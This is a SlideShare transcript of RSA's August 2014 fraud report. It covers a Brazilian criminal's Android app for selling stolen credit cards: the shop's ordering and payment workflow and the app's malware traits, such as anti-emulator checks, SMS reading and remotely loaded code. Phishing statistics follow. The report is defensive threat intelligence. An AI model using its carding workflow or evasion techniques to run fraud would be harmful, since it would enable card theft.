RSA Online Fraud Report - August 2014
Upcoming SlideShare
Loading in...5
×

Like this? Share it with your network

Share

RSA Online Fraud Report - August 2014

  • 391 views
Uploaded on

Cybercriminal in Brazil shares mobile credit card store app ...

Cybercriminal in Brazil shares mobile credit card store app

RSA agents recently traced a threat actor advertising a mobile credit card store application. The cybercriminal shared the information on his Facebook page, including
methods for using the app and links for downloading it. Besides the obvious purpose of selling compromised credentials, launching the application on a mobile device also prompts requests for user permissions, which can give the application the kind of control over the device that is usually associated with malicious malware applications

More in: Technology
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
No Downloads

Views

Total Views
391
On Slideshare
391
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
6
Comments
0
Likes
1

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. R S A MO N T H LY F R A U D R E P O R T page 1 F R A U D R E P O RT CYBERCRIMINAL IN BRAZIL SHARES MOBILE CREDIT CARD STORE APP August 2014 RSA agents recently traced a threat actor advertising a mobile credit card store application. The cybercriminal shared the information on his Facebook page, including methods for using the app and links for downloading it. Besides the obvious purpose of selling compromised credentials, launching the application on a mobile device also prompts requests for user permissions, which can give the application the kind of control over the device that is usually associated with malicious malware applications. RSA’s open source investigation revealed a cybercriminal openly advertising a CC store (Figure 1) designed as a mobile phone application for Android and iPhone devices (a translation follows below). “Good evening everybody! Today I’ll show a project that I’ve been developing for some while... it’s an automated credit card shop application that runs on Android and iOS, using my web credit card store as database. Remember that I’m the first Brazilian programmer to develop a mobile application that sells credit cards. My clients are increasing day by day and I hope that this new system helps them on their shopping. The Android application is already nearly done and the iOS one is 60% done (tested on Galaxy S5 and iPhone 5S, if it doesn’t work on your mobile, send me a message with your model and I’ll check!). This message is already long so I won’t be giving any more details. Below there’s the link for my website to download the app and its link on Google Play! Don’t forget to install it on your Android, and next week I hope that iOS will get it too!”
  • 2. R S A MO N T H LY F R A U D R E P O R T page 2 AVAILABLE IN THE OPEN MARKET The application was made available as a free download on Google Play. The cybercriminal provided the following instructions for using the app: ––Order a batch of CC credentials ––Enter personal info ––App will send banking info in order to make a deposit ––Wait 24 hours to make a transaction ––Take photo of the transaction deposit slip for proof, and send it to fraudster ––Receive CC credentials in return mail In the CC shop website shared by the fraudster, there is a link that automatically starts downloading the application (Figure 2). By clicking on the Android link, an Android binary (APK) is downloaded, but the iPhone link displays a message advising the user to wait for a week. A sample of screenshots from the app, with relevant translations, can be found below. 1 Methods of payment: We accept only bank deposits. As soon as you make an order, an order number will appear on the screen with the rest of your registration info and total sum to be paid. After you make the order you have 24 hours to make the payment and send the receipt (can be a photo, scanned or digital receipt for financial@...). Remember that a few cents will be added to the sum to better track the deposit. The client will then receive an email confirmation. We can’t guarantee product availability before the money is in the bank account. 2 Delivery time: After the payment confirmation we expect a 2 hour delay for sending the information. When the payment is accounted for by our financial sector, the client will receive confirmation via email. Our objective is for your order to be delivered ASAP. Plan your shopping and choose the best delivery method according to your needs. 3 Information exchange: Offering the best service to our clients with total guarantee is the most important objective for us. We want you to have the best shopping experience possible, so we accept exchange or your money back with no cost. Buttons: “Agree” / “Disagree”.
  • 3. R S A MO N T H LY F R A U D R E P O R T page 3 ––Order code ––Name ––Email ––Package: Gold ––Quantity: 10 units ––Payment method: Deposit ––Total value: R$ 700,15 (Real) Send order Your order was successfully sent! ––Check your email for deposit info. –– After the deposit, you’ll receive a payment confirmation in the CONFIRMATION menu ANALYSIS OF THE MOBILE APP A deeper look into the Android application shows that it has potential to be used as malware. Upon launching, the app requests a large number of permissions from the user, similar to permissions commonly seen in malicious mobile malware. Some of the permissions requested include: ––Read and write in Calendar and Contacts ––Access your location (GPS and network) ––Call numbers ––Read and write to protected and to external storage ––Access to your camera and microphone ––Access to the device ID and phone status After performing reverse engineering and static code analysis on the application, RSA agents discovered code that could indicate its use as malware. The app has the ability to download and install new applications and functions (such as reading SMS, reading SD cards, etc.). This means the application can update itself later, installing additional applications that can make use of any of the above permissions.
  • 4. R S A MO N T H LY F R A U D R E P O R T page 4 Additional features revealed in analysis of the application: –– Upon opening the application, it spams the user with two different advertisement banners. –– The app has access to the external storage, so it can store and install new applications in the external memory space. –– The app employs anti-SDK methods by reading the Android OS Specs to verify if it is running on a mobile device or on a virtual machine (laboratory testing environment). –– The app reads the country code and network operator code from the SIM card. –– Upon installation, the app attempts to access the SMS Service and read SMS messages. It is important to note that the CC store application source code is not featured in the Android binary that was originally downloaded to the device. Instead, the application updates itself as follows: –– When the application is launched, it downloads the necessary library from the fraudster’s server. The library contains the source code providing the functions needed to make the CC store accessible via the user device. –– The fraudster can change the source code from his side at any time, so that the user application can download a new version and use it without the need to be updated. –– In some cases, the library is not downloaded, even though internet access is available. This may be due to the app performing an anti-SDK check and only downloading the library if it verifies that it is not running on a virtual machine. CONCLUSION This is the one of the first malicious apps developed by Brazilians for mobile. The different permission requests upon launching may be a sign that the app is also used as malware. Ironically, since cybercriminals are the ones who will use this app to buy CC credentials, they may also become” ripped” by the developers of the app as well.
  • 5. R S A MO N T H LY F R A U D R E P O R T page 5 Phishing Attacks per Month RSA identified 42,571 phishing attacks in July, marking a 25% increase from June. Based on this figure, RSA estimates phishing cost global organizations $362 million in losses in July. US Bank Types Attacked U.S. regional banks have consistently been hit with 30 – 35% of phishing volume over the last few months, targeted by about one out of every three attacks. Top Countries by Attack Volume The U.S. remained the most targeted country in July with 63% of phishing volume. China, the Netherlands, the UK and France were collectively targeted by 20% of total attacks. 42,571 Attacks Credit Unions Regional National 63% 6% 5% 4% Netherlands UK China U.S. AUGUST 2014 Source: RSA Anti-Fraud Command Center
  • 6. R S A MO N T H LY F R A U D R E P O R T page 6 Top Countries by Attacked Brands Brands in the U.S., UK, Canada, and India were targeted by half of all phishing attacks in July. Top Hosting Countries There was a surprising spike of hosted phishing attacks in Hong Kong in July at 13%, while the U.S. continued to remain the top hosting country at 36%, despite a 7% decline from June. Mobile Transactions and Fraud (Q2 ’14) In Q2, 33% of banking transactions originated in the mobile channel. This marks a 20% increase in mobile traffic from 2013, and a 67% increase from 2012. Among total transactions, one out every four identified fraud transactions was initiated from a mobile device. 11% U.S. UK 29% 13% 6% 5% 36% GLOBAL PHISHING LOSSES JULY 2014 2% 33% 25% $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ 33%
  • 7. www.emc.com/rsa CONTACT US To learn more about how RSA products, services, and solutions help solve your business and IT challenges contact your local representative or authorized reseller – or visit us at www.emc.com/rsa ©2014 EMC Corporation. EMC, RSA, the RSA logo, and FraudAction are trademarks or registered trademarks of EMC Corporation in the U.S. and/or other countries. All other trademarks mentioned are the property of their respective holders. AUG RPT 0814